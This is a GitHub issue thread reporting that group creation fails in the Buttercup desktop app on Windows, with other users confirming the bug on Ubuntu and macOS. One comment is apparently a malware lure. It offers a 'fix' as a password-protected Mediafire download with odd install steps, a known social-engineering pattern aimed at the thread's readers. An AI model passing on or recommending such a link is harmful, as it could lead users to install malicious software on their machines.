### ISSUE TITLE
Create Group does not work on Windows 11

### ISSUE THREAD

**Issue by fish-food89** [buttercup/buttercup-desktop#1369]
I noticed on the weekend on one machine and today again on a different machine that I can't create new groups inside my Google Drive vaults when using the desktop app on Windows. Group creation works on two separate Android phones so I have a work around for the time being. I haven't tested the feature with any other type of vault so this is as far as my detection radar goes at the moment.

Here's a screenshot of the dialog where the "Save" button does nothing other change colours when hovering or clicking.

![Screenshot 2024-08-27 083004](https://github.com/user-attachments/assets/85c3c06f-bf3a-4199-ba1a-1272e18cc8e8)

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LucasFidelis** [comment]
This is happening on Ubuntu desktop 22.04

**Comment by YvesAmmann** [comment]
Same issue on macOS (v2.28.0)

**Comment by fish-food89** [comment]
Thanks for the fix 🖤  Just tested it after an update.
